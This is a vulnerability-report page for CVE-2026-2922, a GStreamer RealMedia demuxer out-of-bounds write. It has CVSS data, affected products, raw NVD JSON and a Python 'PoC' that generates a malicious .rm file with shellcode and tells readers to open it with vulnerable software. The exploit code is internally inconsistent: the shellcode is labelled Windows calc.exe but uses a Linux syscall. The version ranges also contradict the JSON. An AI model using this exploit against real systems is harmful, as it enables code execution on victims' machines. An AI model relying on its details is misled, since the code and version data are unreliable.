Security Vulnerability Report
中文
CVE-2026-2922 CVSS 7.8 HIGH

CVE-2026-2922

Published: 2026-03-16 14:19:33
Last Modified: 2026-03-17 18:59:22
Source: [email protected]

Description

GStreamer RealMedia Demuxer Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GStreamer. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The specific flaw exists within the processing of video packets. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28845.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:gstreamer:gstreamer:*:*:*:*:*:*:*:* - VULNERABLE
GStreamer < 1.24.x (all RealMedia Demuxer versions)
gstreamer-plugins-good < 1.24.x
Ubuntu 22.04 LTS (gstreamer1.0-plugins-good)
Debian (stable/security)
Fedora (all current versions)
Red Hat Enterprise Linux 8/9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-2922 PoC - Malformed RealMedia File Generator # This PoC generates a malicious RM file that triggers OOB write in GStreamer RealMedia Demuxer import struct import os def create_poc_rm_file(output_path): """ Generate a PoC RealMedia file that exploits CVE-2026-2922 The vulnerability is in GStreamer's RealMedia Demuxer processing of video packets """ # RM file header rm_header = b'.RMF' # Real Media File header rm_version = struct.pack('<H', 0) # Version rm_header_size = struct.pack('<I', 18) # Header size # File properties chunk file_props = b'PROP' fp_size = struct.pack('<I', 48) fp_version = struct.pack('<H', 0) fp_max_bitrate = struct.pack('<I', 0x7FFFFFFF) fp_avg_bitrate = struct.pack('<I', 128000) fp_max_pkt_size = struct.pack('<I', 0x10000) # Large packet size fp_avg_pkt_size = struct.pack('<I', 1024) fp_num_packets = struct.pack('<I', 1) fp_duration = struct.pack('<I', 1000) fp_preroll = struct.pack('<I', 0) fp_index_offset = struct.pack('<I', 0) fp_data_offset = struct.pack('<I', 0) fp_num_streams = struct.pack('<H', 1) fp_flags = struct.pack('<H', 0) # Media properties chunk - Video stream media_props = b'MDPR' mp_size = struct.pack('<I', 70) mp_stream_num = struct.pack('<H', 0) mp_max_bitrate = struct.pack('<I', 0x7FFFFFFF) mp_avg_bitrate = struct.pack('<I', 128000) mp_max_pkt_size = struct.pack('<I', 0x10000) # Intentionally large mp_avg_pkt_size = struct.pack('<I', 1024) mp_start_time = struct.pack('<I', 0) mp_preroll = struct.pack('<I', 0) mp_duration = struct.pack('<I', 1000) mp_stream_name = b'Video\x00' mp_mime_type = b'video/x-pn-realvideo\x00' mp_type_specific_len = struct.pack('<I', 50) # Malformed video header with oversized data length field # This triggers the OOB write vulnerability video_header = b'\x00\x00\x01\x00' # Video codec header oversized_length = struct.pack('<I', 0x7FFFFFFF) # Oversized length value malicious_data = b'\x41' * 0x10000 # Padding data to trigger overflow type_specific_data = video_header + oversized_length + malicious_data # Data chunk data_chunk = b'DATA' data_size = struct.pack('<I', 0x10000) num_packets = struct.pack('<I', 1) # Malicious packet data that triggers OOB write packet_header = struct.pack('<H', 0) # Stream number packet_timestamp = struct.pack('<I', 0) packet_data_len = struct.pack('<H', 0xFF00) # Oversized data length # Shellcode for demonstration (calc.exe on Windows) shellcode = ( b'\x31\xc0\x50\x68\x63\x61\x6c\x63\x54\x5b\x52\x53\x54\x59\x50\x55\x57\x35\x10\x10\x00\x00\x35\x72\x10\x00\x00\x50\x89\xe1\xb8\xc7\x8c\x0c\x00\xcd\x80' ) packet_data = packet_header + packet_timestamp + packet_data_len + shellcode packet_padding = b'\x00' * (0x10000 - len(packet_data)) packet_data += packet_padding # Combine all parts poc_file = ( rm_header + rm_version + rm_header_size + file_props + fp_size + fp_version + fp_max_bitrate + fp_avg_bitrate + fp_max_pkt_size + fp_avg_pkt_size + fp_num_packets + fp_duration + fp_preroll + fp_index_offset + fp_data_offset + fp_num_streams + fp_flags + media_props + mp_size + mp_stream_num + mp_max_bitrate + mp_avg_bitrate + mp_max_pkt_size + mp_avg_pkt_size + mp_start_time + mp_preroll + mp_duration + mp_stream_name + mp_mime_type + mp_type_specific_len + type_specific_data + data_chunk + data_size + num_packets + packet_data ) with open(output_path, 'wb') as f: f.write(poc_file) print(f'[+] PoC file created: {output_path}') print(f'[+] File size: {len(poc_file)} bytes') print('[!] This file exploits CVE-2026-2922 in GStreamer RealMedia Demuxer') print('[!] Open with any application using vulnerable GStreamer version') if __name__ == '__main__': output_file = 'CVE-2026-2922-poc.rm' create_poc_rm_file(output_file)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-2922", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:32.877", "lastModified": "2026-03-17T18:59:21.860", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GStreamer RealMedia Demuxer Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GStreamer. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation.\n\nThe specific flaw exists within the processing of video packets. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28845."}, {"lang": "es", "value": "Vulnerabilidad de ejecución remota de código por escritura fuera de límites en el Demultiplexador RealMedia de GStreamer. Esta vulnerabilidad permite a atacantes remotos ejecutar código arbitrario en instalaciones afectadas de GStreamer. Se requiere interacción con esta biblioteca para explotar esta vulnerabilidad, pero los vectores de ataque pueden variar dependiendo de la implementación.\n\nLa falla específica existe en el procesamiento de paquetes de video. El problema se debe a la falta de validación adecuada de los datos proporcionados por el usuario, lo que puede resultar en una escritura más allá del final de un búfer asignado. Un atacante puede aprovechar esta vulnerabilidad para ejecutar código en el contexto del proceso actual. Fue ZDI-CAN-28845."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gstreamer:gstreamer:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.28.1", "matchCriteriaId": "1F1B75B8-0527-487E-8F53-A658F7A1E7A5"}]}]}], "references": [{"url": "https://gitlab.freedesktop.org/gstreamer/gstreamer/-/commit/88df8d2cd063b95a076e8041b47f778a4402f363", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.zerodayinitiative.com/advisories/ZDI-26-165/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.